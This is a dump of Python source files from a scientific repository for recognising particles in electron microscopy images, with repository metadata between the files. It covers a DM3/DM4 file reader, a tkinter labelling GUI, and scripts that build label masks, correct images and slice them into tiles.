self.fromfile(self.fid,dtype=self.specialType,count=1)[0] #needs to be read as Big Endian (.byteswap() could also work)\n\n if self.v:\n print('Total number of root tags = {}'.format(nTags))\n\n #Iterate of the number of tag entries\n oldTotalTag = self.curGroupNameAtLevelX\n for ii in range(0,nTags):\n self._readTagEntry()\n\n #Go back down a level after reading all entries\n self.curGroupLevel -= 1\n self.curGroupNameAtLevelX = oldTotalTag\n\n def _readTagEntry(self):\n '''Read one entry in a tag group\n '''\n dataType = self.fromfile(self.fid,dtype=np.dtype('>u1'),count=1)[0]\n\n #Record tag at this level\n self.curTagAtLevelX[self.curGroupLevel] += 1\n\n #get the tag\n lenTagLabel = self.fromfile(self.fid,dtype='>u2',count=1)[0]\n\n if self.v:\n print('_readTagEntry: dataType = {}, lenTagLabel = {}'.format(dataType,lenTagLabel))\n\n if lenTagLabel > 0:\n tagLabelBinary = self.fromfile(self.fid,dtype='<u1',count=lenTagLabel) #read as binary\n tagLabel = self._bin2str(tagLabelBinary)\n if self.v:\n print('_readTagEntry: tagLabel = {}'.format(tagLabel))\n else:\n tagLabel = str(self.curTagAtLevelX[self.curGroupLevel]) #unlabeled tag.\n\n #Save the current group name in case this is needed\n oldGroupName = self.curGroupNameAtLevelX\n\n if dataType == 21:\n #This tag entry contains data\n self.curTagName = tagLabel #save its name\n self._readTagType()\n else:\n #This is a nested tag group\n self.curGroupNameAtLevelX += '.' + tagLabel #add to group names\n\n #An unknown part of the DM4 tags\n if self.dmType == 4:\n temp1 = self.fromfile(self.fid,dtype=self.specialType,count=1)[0]\n\n self._readTagGroup()\n\n self.curGroupNameAtLevelX = oldGroupName\n\n def _readTagType(self):\n #Need to read 8 bytes before %%%% delimiater. Unknown part of DM4 tag structure\n if self.dmType == 4:\n temp1 = self.fromfile(self.fid,dtype=self.specialType,count=1)[0]\n\n delim = self.fromfile(self.fid,dtype='<i1',count=4)\n assert((delim == 37).all()) #delim has to be [37,37,37,37] which is %%%% in ASCII.\n if self.v:\n print('_readTagType: should be %%%% = {}'.format(self._bin2str(delim)))\n\n nInTag = self.fromfile(self.fid,dtype=self.specialType,count=1)[0] #nInTag: unnecessary redundant info\n\n #Determine the type of the data in the tag\n #specifies data type: int8, uint16, float32, etc.\n encodedType = self.fromfile(self.fid,dtype=self.specialType,count=1)[0] #big endian\n\n etSize = self._encodedTypeSize(encodedType)\n\n if etSize > 0:\n #regular data. Read it and store it with the tag name\n if self.v:\n print('regular')\n self._storeTag(self.curTagName, self._readNativeData(encodedType))\n elif encodedType == 18: #string\n if self.v:\n print('string')\n stringSize = self.fromfile(self.fid,dtype='>u4',count=1)[0]\n #strtemp = '' #in case stringSize == 0\n strTempBin = self.fromfile(self.fid,dtype='<u1',count=stringSize) #read as uint8 little endian\n strTemp = self._bin2str(strTempBin)\n self._storeTag(self.curTagName,strTemp)\n elif encodedType == 15: #struct\n #This does not work for field names that are non-zero. This is uncommon\n if self.v:\n print('struct')\n structTypes = self._readStructTypes()\n structs = self._readStructData(structTypes)\n self._storeTag(self.curTagName,structs)\n elif encodedType == 20: #array\n #The array data is not read. It will be read later if needed\n if self.v:\n print('array')\n arrayTypes = self._readArrayTypes() #could be recursive if array contains array(s)\n arrInfo = self._readArrayData(arrayTypes) #only info of the array is read. It is read later if needed\n self._storeTag(self.curTagName,arrInfo)\n\n def _bin2str(self,bin):\n '''Utility function to convert a numpy array of binary values to a python string\n '''\n return ''.join([chr(item) for item in bin])\n\n def _encodedTypeSize(self, encodedType):\n '''Return the number of bytes in a data type for the encodings used by DM\n Constants for the different encoded data types used in DM3 files\n SHORT = 2\n LONG = 3\n USHORT = 4\n ULONG = 5\n FLOAT = 6\n DOUBLE = 7\n BOOLEAN = 8\n CHAR = 9\n OCTET = 10\n uint64 = 12\n -1 will signal an unlisted type\n '''\n if encodedType == 0:\n return 0\n elif (encodedType == 8) | (encodedType == 9) | (encodedType == 10):\n return 1 #1 byte\n elif (encodedType == 2) | (encodedType == 4):\n return 2 #2 bytes\n elif (encodedType == 3) | (encodedType == 5) | (encodedType == 6):\n return 4 #4 bytes\n elif (encodedType == 7) | (encodedType == 12):\n return 8 #8 bytes\n else:\n return -1\n\n def _encodedTypeDtype(self,encodedType):\n '''Translate the encodings used by DM to numpy dtypes according to:\n SHORT = 2\n LONG = 3\n USHORT = 4\n ULONG = 5\n FLOAT = 6\n DOUBLE = 7\n BOOLEAN = 8\n CHAR = 9\n OCTET = 10\n uint64 = 12\n -1 will signal an unlisted type\n '''\n if encodedType == 2:\n return np.dtype('<i2')\n elif encodedType == 3:\n return np.dtype('<i4')\n elif encodedType == 4:\n return np.dtype('<u2')\n elif encodedType == 5:\n return np.dtype('<u4')\n elif encodedType == 6:\n return np.dtype('<f4')\n elif encodedType == 7:\n return np.dtype('<f8')\n elif encodedType == 8:\n return np.dtype('<u1')\n elif encodedType == 9:\n return np.dtype('<u1')\n elif encodedType == 10:\n return np.dtype('<u1')\n elif encodedType == 12:\n return np.dtype('<u8')\n else:\n return -1\n\n def _readStructTypes(self):\n '''Analyze the types of data in a struct\n '''\n structNameLength = self.fromfile(self.fid,count=1,dtype=self.specialType)[0] #this is not needed\n nFields = self.fromfile(self.fid,count=1,dtype=self.specialType)[0]\n if self.v:\n print('_readStructTypes: nFields = {}'.format(nFields))\n\n if(nFields > 100):\n raise RuntimeError('Too many fields in a struct.')\n\n fieldTypes = np.zeros(nFields)\n for ii in range(0,nFields):\n aa = self.fromfile(self.fid,dtype=self.specialType,count=2) #nameLength, fieldType\n nameLength = aa[0] #not used currently\n fieldTypes[ii] = aa[1]\n return fieldTypes\n\n def _readStructData(self,structTypes):\n '''Read the data in a struct\n '''\n struct = np.zeros(structTypes.shape[0])\n for ii, encodedType in enumerate(structTypes):\n etSize = self._encodedTypeSize(encodedType) #the size of the data type\n struct[ii] = self._readNativeData(encodedType) #read this type of data\n return struct\n\n def _readNativeData(self,encodedType):\n '''reads ordinary data types in tags\n SHORT (int16) = 2;\n LONG (int32) = 3;\n USHORT (uint16) = 4;\n ULONG (uint32) = 5;\n FLOAT (float32) = 6;\n DOUBLE (float64) = 7;\n BOOLEAN (bool) = 8;\n CHAR (uint8 character) = 9;\n OCTET (??) = 10;\n UINT64 (uint64) = 11;\n '''\n if encodedType == 2:\n val = self.fromfile(self.fid,count=1,dtype='<i2')[0]\n elif encodedType == 3:\n val = self.fromfile(self.fid,count=1,dtype='<i4')[0]\n elif encodedType == 4:\n val = self.fromfile(self.fid,count=1,dtype='<u2')[0]\n elif encodedType == 5:\n val = self.fromfile(self.fid,count=1,dtype='<u4')[0]\n elif encodedType == 6:\n val = self.fromfile(self.fid,count=1,dtype='<f4')[0]\n elif encodedType == 7:\n val = self.fromfile(self.fid,count=1,dtype='<f8')[0]\n elif encodedType == 8: #matlab uchar\n val = self.fromfile(self.fid,count=1,dtype='<u1')[0] #return character or number?\n if self.v:\n print('_readNativeData untested type, val: {}, {}'.format(encodedType,val))\n elif encodedType == 9: #matlab *char\n val = self.fromfile(self.fid,count=1,dtype='<i1')[0] #return character or number?\n if self.v:\n print('_readNativeData untested type, val: {}, {}'.format(encodedType,val))\n elif encodedType == 10: #matlab *char\n val = self.fromfile(self.fid,count=1,dtype='<i1')[0]\n if self.v:\n print('_readNativeData untested type, val: {}, {}'.format(encodedType,val))\n elif encodedType == 11:\n val = self.fromfile(self.fid,count=1,dtype='<u8')[0]\n elif encodedType == 12:\n val = self.fromfile(self.fid,count=1,dtype='<u8')[0] #unknown type, but this works\n else:\n print('_readNativeData unknown data type: {}'.format(encodedType))\n raise\n\n if self.v:\n print('_readNativeData: encodedType == {} and val = {}'.format(encodedType, val))\n\n return val\n def _readArrayTypes(self):\n '''Analyze the types of data in an array\n '''\n arrayType = self.fromfile(self.fid,dtype=self.specialType,count=1)[0]\n\n itemTypes = []\n\n if arrayType == 15:\n #nested Struct\n itemTypes = self._readStructTypes()\n elif arrayType == 20:\n #Nested array\n itemTypes = _readArrayTypes()\n else:\n itemTypes.append(arrayType)\n if self.v:\n print('_readArrayTypes: itemTypes = {}'.format(itemTypes))\n return itemTypes\n\n def _readArrayData(self,arrayTypes):\n '''Read information in an array based on the types provided. Binary data is not read at this point.\n '''\n\n #The number of elements in the array\n arraySize = self.fromfile(self.fid,count=1,dtype=self.specialType)[0]\n\n if self.v:\n print('_readArrayData: arraySize, arrayTypes = {}, {}'.format(arraySize,arrayTypes))\n\n #Everything used to calculate the bufSize is not needed anymore. THis can be removed after testing\n itemSize = 0\n for encodedType in arrayTypes:\n if self.v:\n print('_readArrayData: encodedType = {}'.format(encodedType))\n etSize = self._encodedTypeSize(encodedType)\n itemSize += etSize\n\n bufSize = arraySize * itemSize\n bufSize = bufSize.astype('<u8') #change to an integer\n\n if self.v:\n print('_readArrayData: arraySize, itemSize = {}, {}'.format(arraySize, itemSize))\n\n if self.curTagName == 'Data':\n #This is a binary array. Save its location to read later if needed\n self._storeTag(self.curTagName + '.arraySize', bufSize)\n self._storeTag(self.curTagName + '.arrayOffset', self.tell())\n self._storeTag(self.curTagName + '.arrayType', encodedType)\n self.seek(self.fid, bufSize.astype('<u8'),1) #advance the pointer by bufsize from current position\n arrOut = 'Data unread. Encoded type = {}'.format(encodedType)\n elif bufSize < 1e3: #set an upper limit on the size of array that will be read in as a string\n #treat as a string\n for encodedType in arrayTypes:\n stringData = self.fromfile(self.fid,count=arraySize,dtype=self._encodedTypeDtype(encodedType))\n arrOut = self._bin2str(stringData)\n\n #This is the old way to read this in. Its not really correct though.\n #stringData = self.bin2str(self.fromfile(self.fid,count=bufSize,dtype='<u1'))\n #arrOut = stringData.replace('\\x00','') #remove all spaces from the string data\n\n #Catch useful tags for images and spectra (nm, eV, etc.)\n fullTagName = self.curGroupNameAtLevelX + '.' + self.curTagName\n if((fullTagName.find('Dimension') > -1) & (fullTagName.find('Units') > -1) ):# & (self.numObjects > 0)):\n self.scale.append(self.scale_temp)\n self.scaleUnit.append(arrOut)\n self.origin.append(self.origin_temp)\n else:\n self._storeTag(self.curTagName + '.arraySize', bufSize)\n self._storeTag(self.curTagName + '.arrayOffset', self.tell())\n self._storeTag(self.curTagName + '.arrayType', encodedType)\n self.seek(self.fid, bufSize.astype('<u8'),1) #advance the pointer by bufsize from current position\n arrOut = 'Array unread. Encoded type = {}'.format(encodedType)\n\n return arrOut\n\n def _storeTag(self,curTagName,curTagValue):\n '''Builds the full tag name and key/value pair as text. Also calls another\n function to catch useful tags and values. Also saves all tags in a dictionary.\n '''\n #Build the full tag name (key) and add the tag value\n if self.v:\n print('_storeTag: curTagName, curTagValue = {}, {}'.format(curTagName,curTagValue))\n totalTag = self.curGroupNameAtLevelX + '.' + '{}'.format(curTagName) #+ '= {}'.format(curTagValue)\n\n self._catchUsefulTags(totalTag,curTagName,curTagValue)\n\n self.allTags[totalTag] = curTagValue #this needs to be done better.\n\n return(totalTag)\n\n def _catchUsefulTags(self,totalTag,curTagName,curTagValue):\n '''Find interesting keys and keep their values for later. This is separate from _storeTag\n so that it is easy to find and modify.\n '''\n\n #Save that a useful object has been found\n if totalTag.find('ImageData.Calibrations.Dimension.1.Scale')>-1:\n self.numObjects += 1 #data is contained in this file\n\n if curTagName.find('Data.arraySize')>-1:\n self.dataSize.append(curTagValue)\n elif curTagName.find('Data.arrayOffset') >-1:\n self.dataOffset.append(curTagValue)\n elif curTagName.find('DataType')>-1:\n self.dataType.append(curTagValue)\n elif totalTag.find('Dimensions.1')>-1:\n self.xSize.append(curTagValue)\n self.ySize.append(1)\n self.zSize.append(1)\n self.zSize2.append(1)\n self.dataShape.append(1) # indicate as at least 1D data\n elif totalTag.find('Dimensions.2')>-1:\n self.ySize[-1] = curTagValue #OR self.ysize[self.numObjects] = self.curTagValue\n self.dataShape[-1] = 2 # indicate as at least 2D data\n elif totalTag.find('Dimensions.3')>-1:\n self.zSize[-1] = curTagValue\n self.dataShape[-1] = 3 # indicate as at least 3D data\n elif totalTag.find('Dimensions.4')>-1:\n self.zSize2[-1] = curTagValue\n self.dataShape[-1] = 4 # indicate as at least 3D data\n elif (totalTag.find('Dimension.')>-1) & (totalTag.find('.Scale')>-1):\n self.scale_temp = curTagValue\n elif (totalTag.find('Dimension.')>-1) & (totalTag.find('.Origin')>-1):\n self.origin_temp = curTagValue\n else:\n pass\n\n def writeTags(self):\n fnameOutPrefix = self.filename.split('.dm3')[0]\n try:\n #open a text file to write out the tags\n with open(fnameOutPrefix+'_tags.txt','w') as fidOut:\n for nn in sorted(self.allTags):\n try:\n oo = '{} = {}'.format(nn,str(self.allTags[nn]))\n fidOut.write(oo)\n except:\n fidOut.write('{} = dm.py error'.format(nn))\n fidOut.write('\\n')\n fidOut.close() #this might not be necessary\n except NameError:\n print(\"Issue opening tags output file.\")\n raise\n except:\n raise\n\n def _checkIndex(self, i):\n '''Check index i for sanity, otherwise raise Exception.\n\n Parameters:\n i (int): Index.\n\n '''\n\n # check type\n if not isinstance(i, int):\n raise TypeError('index supposed to be integer')\n\n # check whether in range\n if i < 0 or i > self.numObjects:\n raise IndexError('Index out of range, trying to access element {} of {} valid elements'.format(i+1, self.head['ValidNumberElements']))\n\n return\n\n def _DM2NPDataType(self, dd):\n '''Convert the DM data type value into a numpy dtype\n '''\n if dd == 6:\n return np.uint8\n elif dd == 10:\n return np.uint16\n elif dd == 11:\n return np.uint32\n elif dd == 9:\n return np.int8\n elif dd == 1:\n return np.int16\n elif dd == 7:\n return np.int32\n elif dd == 2:\n return np.float32\n elif dd == 12:\n return np.float64\n #elif dd == 14: #this is supposed to be bit1 in matlab, but Im not sure what that translates to in numpy\n # return np.uint8 #bit1 ??\n elif dd == 3:\n return np.complex64\n elif dd == 13:\n return np.complex128\n elif dd == 23:\n raise IOError('RGB data type is not supported yet.')\n #return np.uint8\n else:\n print(\"4321\")\n raise IOError('Unsupported binary data type during conversion to numpy dtype. DM dataType == {}'.format(dd))\n\n def getDataset(self, index):\n '''Retrieve a dataset from the DM file.\n Note: Most DM3 and DM4 files contain a small \"thumbnail\" as the first dataset written as RGB data. This function ignores that dataset if it exists. To retrieve the thumbnail use the getThumbnail() function\n '''\n #The first dataset is usually a thumbnail. Test for this and skip the thumbnail automatically\n if self.numObjects == 1:\n ii = index\n else:\n ii = index + 1\n\n #Check that the dataset exists.\n try:\n self._checkIndex(ii)\n except:\n raise\n\n self.seek(self.fid, self.dataOffset[ii],0) #Seek to start of dataset from beginning of the file\n\n outputDict = {}\n\n outputDict['filename'] = osBasename(self.filename)\n\n #Parse the dataset to see what type it is (image, image series, spectra, etc.)\n if self.xSize[ii] > 0:\n pixelCount = self.xSize[ii]*self.ySize[ii]*self.zSize[ii]*self.zSize2[ii]\n jj = 0 #counter to determine where the first scale value starts\n for nn in self.dataShape[0:ii]:\n jj += nn #sum up all number of dimensions for previous datasets\n #if self.dataType == 23: #RGB image(s)\n # temp = self.fromfile(self.fid,count=pixelCount,dtype=np.uint8).reshape(self.ysize[ii],self.xsize[ii])\n if self.zSize[ii] == 1: #2D data\n outputDict['data'] = self.fromfile(self.fid,count=pixelCount,dtype=self._DM2NPDataType(self.dataType[ii])).reshape((self.ySize[ii],self.xSize[ii]))\n outputDict['pixelUnit'] = self.scaleUnit[jj:jj+self.dataShape[ii]][::-1] #need to reverse the order to match the C-ordering of the data\n outputDict['pixelSize'] = self.scale[jj:jj+self.dataShape[ii]][::-1]\n outputDict['pixelOrigin'] = self.origin[jj:jj+self.dataShape[ii]][::-1]\n elif self.zSize2[ii] > 1: #4D data\n outputDict['data'] = self.fromfile(self.fid,count=pixelCount,dtype=self._DM2NPDataType(self.dataType[ii])).reshape((self.zSize2[ii],self.zSize[ii],self.ySize[ii],self.xSize[ii]))\n outputDict['pixelUnit'] = self.scaleUnit[jj:jj+self.dataShape[ii]][::-1] #need to reverse the order to match the C-ordering of the data\n outputDict['pixelSize'] = self.scale[jj:jj+self.dataShape[ii]][::-1]\n outputDict['pixelOrigin'] = self.origin[jj:jj+self.dataShape[ii]][::-1]\n else: #3D array\n outputDict['data'] = self.fromfile(self.fid,count=pixelCount,dtype=self._DM2NPDataType(self.dataType[ii])).reshape((self.zSize[ii],self.ySize[ii],self.xSize[ii]))\n outputDict['pixelUnit'] = self.scaleUnit[jj:jj+self.dataShape[ii]][::-1] #need to reverse the order to match the C-ordering of the data\n outputDict['pixelSize'] = self.scale[jj:jj+self.dataShape[ii]][::-1]\n outputDict['pixelOrigin'] = self.origin[jj:jj+self.dataShape[ii]][::-1]\n\n return outputDict\n\n def _readRGB(self,xSizeRGB,ySizeRGB):\n '''Read in a uint8 type array with [Red,green,blue,alpha] channels.\n '''\n return self.fromfile(self.fid,count=xSizeRGB*ySizeRGB*4,dtype='<u1').reshape(xSizeRGB,ySizeRGB,4)\n\n def getThumbnail(self):\n '''Read the thumbnail saved as the first dataset in the DM file as an RGB array\n Unsure if this is correct.\n '''\n self.seek(self.fid, self.dataOffset[0],0)\n return self._readRGB(self.ySize[0],self.xSize[0])\n\ndef dmReader(fName,dSetNum=0,verbose=False):\n '''Simple function to parse the file and read the requested dataset\n '''\n f1 = fileDM(fName,verbose) #open the file and init the class\n f1.parseHeader() #parse the header\n im1 = f1.getDataset(dSetNum) #get the requested dataset (first by default)\n del f1 #delete the class and close the file\n return im1 #return the dataset and metadata as a dictionary\n" }, { "alpha_fraction": 0.5828651785850525, "alphanum_fraction": 0.6095505356788635, "avg_line_length": 33.24038314819336, "blob_id": "6073384c870ac7ef686f02e24c94283e49392db1", "content_id": "7bb1363a0ccfc2649423b9e498670302992409b3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3560, "license_type": "no_license", "max_line_length": 165, "num_lines": 104, "path": "/label_data_gui/learning_tkinter_addImg.py", "repo_name": "ckgrosch/particleRecognition", "src_encoding": "UTF-8", "text": "# Basic Animation Framework\n\nfrom tkinter import *\nfrom PIL import Image, ImageTk\n\n\n####################################\n# customize these functions\n####################################\n\n# Adds shapes on mouse clicks and deletes them on pressing 'd'\ndef init(data):\n data.circleCenters = [ ]\n data.recordCircleCenters = [ ]\n data.radii = [ ]\n\ndef mousePressed(event, data,canvas):\n newCircleCenter = (event.x, event.y)\n recordCircleCenter = (canvas.canvasx(event.x),canvas.canvasy(event.y))\n data.circleCenters.append(newCircleCenter)\n data.recordCircleCenters.append(recordCircleCenter)\n data.radii.append(data.radius)\n\ndef keyPressed(event, data):\n if (event.char == \"d\"):\n if (len(data.circleCenters) > 0):\n data.circleCenters.pop(0)\n else:\n print(\"No more circles to delete!\")\n if event.keysym == \"Up\":\n data.radius += 2\n data.radii.pop()\n data.radii.append(data.radius)\n if event.keysym == \"Down\":\n data.radius -= 2\n data.radii.pop()\n data.radii.append(data.radius)\n\ndef redrawAll(canvas, data,photo):\n #draw the photo\n canvas.create_image(0,0,image = photo,anchor = \"nw\")\n # draw the circles\n for idx,circleCenter in enumerate(data.circleCenters):\n (cx, cy) = circleCenter\n canvas.create_oval(cx-data.radii[idx], cy-data.radii[idx], cx+data.radii[idx], cy+data.radii[idx], fill=None, outline = \"magenta\")\n # draw the text\n canvas.create_text(data.width/2, 20,\n text=\"Example: Adding and Deleting Shapes\")\n canvas.create_text(data.width/2, 40,\n text=\"Mouse clicks create circles\")\n canvas.create_text(data.width/2, 60,\n text=\"Pressing 'd' deletes circles\")\n\n####################################\n# use the run function as-is\n####################################\n\ndef run(width=524, height=524):\n def redrawAllWrapper(canvas, data,photo):\n canvas.delete(ALL)\n canvas.create_rectangle(0, 0, data.width, data.height,\n fill='white', width=0)\n redrawAll(canvas, data, photo)\n canvas.update() \n\n def mousePressedWrapper(event, canvas, data):\n mousePressed(event, data, canvas)\n redrawAllWrapper(canvas, data, photo)\n\n def keyPressedWrapper(event, canvas, data):\n keyPressed(event, data)\n redrawAllWrapper(canvas, data,photo)\n\n # Set up data and call init\n class Struct(object): pass\n data = Struct()\n data.width = width\n data.height = height\n data.radius = 20\n data\n root = Tk()\n init(data)\n image = Image.open('/Users/kategroschner/Box Sync/Research/HR-TEM/20180227/20180227_101729F_prepped20171204/8bit/20180227_101729F_plasma15sec_Mh370kx__0014.tif')\n image = image.resize((512,512), Image.BICUBIC)\n photo = ImageTk.PhotoImage(image)\n #label = Label(image=photo)\n #label.image = photo\n #label.pack()\n # create the root and the canvas\n canvas = Canvas(width=data.width, height=data.height)\n canvas.create_image(0,0,image = photo, anchor = \"nw\")\n canvas.pack()\n # set up events\n root.bind(\"<Button-1>\", lambda event:\n mousePressedWrapper(event, canvas, data))\n root.bind(\"<Key>\", lambda event:\n keyPressedWrapper(event, canvas, data))\n redrawAll(canvas, data, photo)\n # and launch the app\n root.mainloop() # blocks until window is closed\n print(\"bye!\")\n print(data.recordCircleCenters,data.radii)\n\nrun(524, 524)" }, { "alpha_fraction": 0.581632673740387, "alphanum_fraction": 0.5918367505073547, "avg_line_length": 32.25, "blob_id": "5747bfe3a8af2df30d6838de7a9d29a777bc17e8", "content_id": "c10462f4b7bf0cafbbd88e3eb57021b981e3c719", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1862, "license_type": "no_license", "max_line_length": 90, "num_lines": 56, "path": "/classfier_builds/labelmask.py", "repo_name": "ckgrosch/particleRecognition", "src_encoding": "UTF-8", "text": "from glob import glob\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nfrom ast import literal_eval\nimport shutil\n\ndef txt_reader(file):\n txt_info = open(file,'r')\n txt = []\n centers = []\n radii = []\n for line in txt_info:\n if line == '\\n':\n pass\n else:\n line = line.strip('\\n')\n txt.append(line)\n center_stop = txt.index('Radius Size:')\n radius_stop = txt.index('Defect Label:')\n for loc in txt[1:center_stop]:\n centers.append(literal_eval(loc))\n for loc in txt[center_stop+1:radius_stop] :\n radii.append(int(loc))\n image_size = literal_eval(txt[-1])\n return centers, radii, image_size\n\n\ndef spot_maker(location, radius, label_mask):\n for x in np.arange(location[0]-radius,location[0]+radius,1):\n for y in np.arange(location[1]-radius,location[1]+radius,1):\n dx = x - location[0]\n dy = y - location[1]\n if np.sqrt((dx**2+dy**2)) <= radius \\\n and int(x) < label_mask.shape[0] and int(y) < label_mask.shape[1]:\n label_mask[int(y),int(x)] = 1\n return label_mask\n\ndef mask_maker(file):\n centers, radii, image_size = txt_reader(file)\n label_mask = np.zeros(image_size)\n for idx,radius in enumerate(radii):\n label_mask = spot_maker(centers[idx],radius,label_mask)\n return label_mask\n\ndef mask_pipeline(directory):\n file_list = glob(directory+'/text_files/*.txt')\n name_list = [name.split('/')[-1].split('.')[0] for name in file_list]\n for idx, file in enumerate(file_list):\n if len(open(file,'r').readlines()) == 0:\n pass\n else:\n label_mask = mask_maker(file)\n plt.imsave(directory+'/labels/'+name_list[idx]+'.png',label_mask, cmap='gray')\n shutil.move(file,directory+'/old_text_files/')\n print('done!')\n" }, { "alpha_fraction": 0.536238968372345, "alphanum_fraction": 0.5773751139640808, "avg_line_length": 39.039215087890625, "blob_id": "3a50ed3c92a87ff28a2da1c86a698a96f5bc189b", "content_id": "9558f8d7bb13779f1333c55502c935015c23d1a4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2042, "license_type": "no_license", "max_line_length": 124, "num_lines": 51, "path": "/image_processing/timage_v1.py", "repo_name": "ckgrosch/particleRecognition", "src_encoding": "UTF-8", "text": "import numpy as np\nimport matplotlib.pyplot as plt\nimport os\nfrom glob import glob\nfrom ncempy.io import dm\nfrom matplotlib.image import imsave\nfrom matplotlib import cm\nfrom skimage import transform\n\ndef imm(image):\n fig, ax = plt.subplots(figsize=(10,10))\n ax.imshow(image, cmap = 'gray')\n ax.axis('off')\n\ndef xray_correct(image):\n if type(image) is not np.ndarray:\n raise TypeError('Input must be numpy ndarray.')\n image[image<0] = 0\n bad_loc = np.argwhere(image > ((image.mean()+1000)-image.std()))\n for loc in bad_loc:\n if loc[0]+1 > (image.shape[0]-1) or loc[0]-1 < 0 or loc[1]+1 > (image.shape[1]-1) or loc[1] - 1 < 0:\n new_pixel_int = image.mean()+(image.std()*5)\n else:\n neighbor_sum = image[loc[0]-1,loc[1]] + image[loc[0]+1,loc[1]] + image[loc[0],loc[1]-1] + image[loc[0],loc[1]+1]\n new_pixel_int = neighbor_sum /4\n image[loc[0],loc[1]] = new_pixel_int\n return image\n# def auto_adjust_TEM(image):\n# image = exposure.equalize_adapthist(exposure.adjust_sigmoid(clean_xray(image)))\n# return image\n\ndef adjust_pipeline(directory_list):\n for directory in directory_list:\n try:\n os.mkdir(directory+'/adjustedPNG')\n new_directory = directory+'/adjustedPNG'\n except:\n new_directory = directory+'/adjustedPNG'\n dm3s = glob(directory+ '/*.dm3')\n for dm3 in dm3s:\n img = dm.dmReader(dm3)['data']\n if img.shape[0] < 1024:\n pass\n elif img.shape[0] == 2048 and img.shape[1] == 2048:\n img = transform.resize(img,(1024,1024))\n name = dm3.split('/')[-1].split('.')[0]\n imsave(new_directory+'/'+name+'.png', xray_correct(img), format=\"png\", cmap=cm.gray)\n elif img.shape[0] == 1024 and img.shape[1] == 1024:\n name = dm3.split('/')[-1].split('.')[0]\n imsave(new_directory+'/'+name+'.png', xray_correct(img), format=\"png\", cmap=cm.gray)\n print('done!')\n" }, { "alpha_fraction": 0.358705997467041, "alphanum_fraction": 0.358705997467041, "avg_line_length": 60.82352828979492, "blob_id": "36d11a0001d2b9510cdd1010073437b20c44cda2", "content_id": "b4f91044eda7c4b87b2e0fb854536c5b143b27d6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1051, "license_type": "no_license", "max_line_length": 318, "num_lines": 17, "path": "/image_processing/ncempy/io/README.rst", "repo_name": "ckgrosch/particleRecognition", "src_encoding": "UTF-8", "text": "ncempy.io\n==========\n\nThe ``ncempy.io`` module contains the file IO necessary for the various dataformats floating around in electron microscopy. Internally the package is designed to work in the versatile EMD file format, other formats are interfaced with importers. The interfaces of each file format are implemented in their own classes.\n\nContents\n--------\n\nOverview of contents with short description:\n\n+--------------------+--------------------------------------------------------------------+\n| Module | Description |\n+====================+====================================================================+\n| emd | EMD file format. |\n+--------------------+--------------------------------------------------------------------+\n| ser | SER file format used by TIA (FEI). |\n+--------------------+--------------------------------------------------------------------+\n" }, { "alpha_fraction": 0.5556100606918335, "alphanum_fraction": 0.5823421478271484, "avg_line_length": 49.03067398071289, "blob_id": "27af7a89a753645f5a85012b40eaca780d7ccc7a", "content_id": "d6bae2ebe1e5feb3435f67be4acc6612492c3215", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8155, "license_type": "no_license", "max_line_length": 113, "num_lines": 163, "path": "/classfier_builds/helperfuncs.py", "repo_name": "ckgrosch/particleRecognition", "src_encoding": "UTF-8", "text": "from glob import glob\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nfrom skimage import io\n\ndef imm(image):\n \"\"\"function to display a large grayscale image\"\"\"\n fig, ax = plt.subplots(figsize=(10,10))\n ax.imshow(image, cmap = 'gray')\n ax.axis('off')\n\ndef check_label(labels,images,idx,alpha = 0.25):\n \"\"\"Takes in skimage ImageCollections for labels and original images and an index for an image\n to show the overlay of the created label mask and original image\"\"\"\n pic = alpha*np.reshape(labels[idx][:,:,0],(1024,1024)) + (1-alpha)*np.reshape(images[idx][:,:,0],(1024,1024))\n imm(pic)\n\ndef image_slice(directory, im_lbl):\n \"\"\"used to break up the 1024x1024 images into 512x512 segments takes a\n diretory and string specifying whether it is slicing 'image' or 'label'\"\"\"\n if im_lbl == 'image':\n file_list = glob(directory+'/images/*.png')\n new_directory = directory + '/sliced_images/'\n elif im_lbl == 'label':\n file_list = glob(directory+'/labels/*.png')\n new_directory = directory + '/sliced_labels/'\n name_list = [name.split('/')[-1].split('.')[0] for name in file_list]\n for idx, file in enumerate(file_list):\n image2split = plt.imread(file)\n image1 = image2split[:512,:512,:]\n plt.imsave(new_directory+name_list[idx]+'_a.png',image1, cmap='gray')\n image1 = image2split[512:,:512,:]\n plt.imsave(new_directory+name_list[idx]+'_b.png',image1, cmap='gray')\n image1 = image2split[:512,512:,:]\n plt.imsave(new_directory+name_list[idx]+'_c.png',image1, cmap='gray')\n image1 = image2split[512:,512:,:]\n plt.imsave(new_directory+name_list[idx]+'_d.png',image1, cmap='gray')\n print('done!')\n\ndef image_slice_small(directory):\n \"\"\"Used to break up the 1024x1024 images into 64x64 segments takes a\n diretory that is the source. This is only for creating training\n dataset. Throws out regions of the masks and images with no identified\n particles so that training set will have better balance of positive and\n negative pixels.\"\"\"\n image_file_list = glob(directory+'/images/*.png')\n image_new_directory = directory + '/small_sliced_images/'\n if os.path.isdir(image_new_directory) != True:\n os.mkdir(image_new_directory)\n label_file_list = glob(directory+'/labels/*.png')\n label_new_directory = directory + '/small_sliced_labels/'\n if os.path.isdir(label_new_directory) != True:\n os.mkdir(label_new_directory)\n image_name_list = [name.split('/')[-1].split('.')[0] for name in image_file_list]\n label_name_list = [name.split('/')[-1].split('.')[0] for name in label_file_list]\n if len(image_name_list) != len(label_name_list):\n raise RuntimeError('different number of images and labels')\n if image_name_list != label_name_list:\n raise RuntimeError('images and labels did not match')\n for idx, file in enumerate(image_file_list):\n image2split = io.imread(file, as_grey=True)\n label2split = io.imread(label_file_list[idx], as_grey=True)\n for x in range(0,15*64,64):\n for y in range(0,15*64,64):\n image = image2split[x:x+64,y:y+64]\n label = label2split[x:x+64,y:y+64]\n if np.any(np.isin([1],label)) == False:\n pass\n else:\n image_name = image_name_list[idx]+ '_' + str(x)+ str(y) + '.png'\n label_name = image_name_list[idx]+ '_' + str(x)+ str(y) + '.png'\n plt.imsave(image_new_directory+image_name,image, cmap='gray')\n plt.imsave(label_new_directory+label_name,label, 